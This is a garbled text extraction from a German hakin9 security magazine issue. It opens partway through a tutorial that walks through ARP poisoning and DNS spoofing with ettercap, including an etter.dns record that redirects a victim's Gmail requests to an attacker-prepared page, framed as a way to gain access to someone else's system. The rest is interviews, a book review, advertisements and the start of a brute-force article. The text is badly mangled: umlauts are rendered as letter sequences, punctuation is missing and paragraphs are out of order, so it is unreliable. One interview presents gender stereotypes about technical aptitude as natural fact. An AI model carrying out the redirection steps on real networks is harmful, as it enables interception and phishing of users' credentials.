macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
920106
FUumlR EINSTEIGER
Das Problem mit solchen Authentifizierung ist dass sie nur maximal so sicher sind wie ihr schwaumlchstes Glied Durch das Web 20 wird im-
mer mehr auf Komfort und Benutzerfreundlichkeit ge-setzt wodurch einfache Sicherheitsmechanismen ihre Wirkung verfehlen Bruteforce Angriffe galten durch die schier unendlichen Kombinationsmoumlglichkeiten als bdquonicht mehr praktikabelldquo Viele Seiten erlauben es uns aber die Anzahl an Versuchen drastisch einzuschraumln-ken da sie Informationen preisgeben die einen Angriff oftmals bedeutend einfacher machen
